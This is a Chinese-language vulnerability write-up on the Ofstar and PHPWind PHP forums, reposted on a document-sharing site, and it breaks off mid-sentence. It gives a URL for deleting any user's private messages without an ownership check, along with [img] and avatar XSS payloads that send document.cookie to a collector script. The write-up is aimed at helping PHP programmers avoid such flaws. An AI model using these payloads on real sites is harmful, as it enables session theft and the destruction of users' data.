Ofstar和phpind论坛安全性分析.docx

上传人:b****5 文档编号:28226853 上传时间:2023-07-09 格式:DOCX 页数:7 大小:18.86KB
下载 相关 举报
Ofstar和phpind论坛安全性分析.docx_第1页
第1页 / 共7页
Ofstar和phpind论坛安全性分析.docx_第2页
第2页 / 共7页
Ofstar和phpind论坛安全性分析.docx_第3页
第3页 / 共7页
Ofstar和phpind论坛安全性分析.docx_第4页
第4页 / 共7页
Ofstar和phpind论坛安全性分析.docx_第5页
第5页 / 共7页
点击查看更多>>
下载资源
资源描述

Ofstar和phpind论坛安全性分析.docx

《Ofstar和phpind论坛安全性分析.docx》由会员分享,可在线阅读,更多相关《Ofstar和phpind论坛安全性分析.docx(7页珍藏版)》请在冰豆网上搜索。

Ofstar和phpind论坛安全性分析.docx

Ofstar和phpind论坛安全性分析

Ofstar和phpind论坛安全性分析

前言

ofstar是php论坛新秀,我没有看代码写得如何,第一印象可读性不错,分析这个论坛的原因还是因为好友harry跟我说这个ofstar论坛抄袭了他朋友的bmforum(一个php文本数据库论坛)的代码,我不知道有没有,不过学习人家好的地方,这是理所当然的,我学习php还花近300RMB打印VBB的代码呢。

不管怎么说,如果ofstar真的看了bmforum的代码,只能说明bmforum比ofstar优秀,我没有看textdb版,只看了SQL版,这样两个论坛不占边,则更能看出其水平。

结果花了1个小时的时间,在harry的催促下,草草看了一下代码,结果发现N多漏洞,不过bmforum的开发人员也别得意,其实bmforum也有N多漏洞。

Hoho~~

  由于内部原因Ofstar的开发人员已经放弃了OfstarSQL版本,不过,有意思的是PHPWind论坛其实是和OfstarSQL差不多的。

代码相差无几。

这两个论坛有千丝万缕的关系。

这个只有内部知道了。

后来我又看了看PHPWind的代码。

我想说的就是本文所说OfstarSQL版本的漏洞,PHPWind全部继承了。

代码有少许不同而已。

呵呵。

  由于是在网吧看的代码,有部分漏洞并未有条件实践。

但理论上却是存在的。

写出来的目的也是为了让更多PHP程序员借鉴。

更多在于防范漏洞的思想,而不是方法,方法是多种多样的。

涉及版本

Ofstarv2.0.0SQL正式版

PHPwind1.0

详细

1、非法删除短消息

  这个漏洞的破坏性实在是大,如果你的硬盘被别人格式化了,你还不知道怎么回事,可悲不?

这个问题存在于message.php文件,看以下代码:

133if($action=="del"){

134$db->update("DELETEFROMof_msgWHEREmid='$mid'");

135showmsg('成功删除一条信息');

136}

  直接判断action参数是否为del,是则删除字段变量为mid的消息,并没有检查消息是否是本人的,这样就大乱了,我们提交:

  http:

//localhost/ofstar/message.php?

action=del&mid=1

  这样就可以删除mid为1的消息,如果有一个http扫描器,把这些url按顺序作成列表,导入扫描,不出半分钟。

整个论坛的短消息都会被删除,管理员除了查看Web服务器的日志,就根本不知道是怎么被删除的。

2、明显的跨站脚本攻击

  隐藏的跨站漏洞就没有时间去看了,这个是最明显的,那就是帖子标签的转换,看bbscode.php文件的以下代码:

42if($allow['pic']){

43$message=preg_replace("/\[img\](.+?

)\[\/img\]/eis","cvpic('\1')",$message);

44}else{

  这些代码是转换[img][/img]的贴图标签的。

其实大多数人都是这样写的。

大同小异,这样写并没有错,但是如果缺乏了必要的字符检查,那么就是一个安全隐患,我们提交:

[img]javascript:

alert(document.cookie)[/img]

[img]javascript:

window.open('http:

//127.0.0.1/xss.php?

'+document.cookie;[/img]

  就可以获取任何浏览帖子的会员的cookie了。

还有就是个人资料,如果系统允许调用远程的图片作为头像,那么也是一个可以跨站的地方,直接在图像位置那里输入:

javascript:

alert(document.cookie)

javascript:

window.open('http:

//127.0.0.1/xss.php?

'+document.cookie;

  注意这里要把单引号换成',否则不能提交成功。

3、危害更大的攻击

  既然上面解析[img][/img]没有问题,那我们还可以进行更进一步的攻击,用document.write()可以写出很多具有超强攻击性的代码,如果写一个格式化的代码,或是写入

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1